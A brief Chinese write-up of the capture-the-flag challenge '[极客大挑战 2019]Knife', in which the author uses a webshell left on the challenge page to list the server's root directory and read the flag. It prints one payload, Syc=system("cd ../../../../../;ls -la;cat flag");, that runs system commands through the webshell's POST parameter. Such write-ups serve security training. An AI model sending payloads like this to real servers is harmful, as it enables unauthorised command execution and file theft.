[极客大挑战 2019]Knife 1

看页面提示, 就是个POST提交参数的webshell

image-20211031130415463

在源码里可以找到输出结果, 然后就是传统艺能, 到根目录去看看都有啥好玩意儿

image-20211031133142800

flag就在这里了

1
Syc=system("cd ../../../../../;ls -la;cat flag");
image-20211031133328805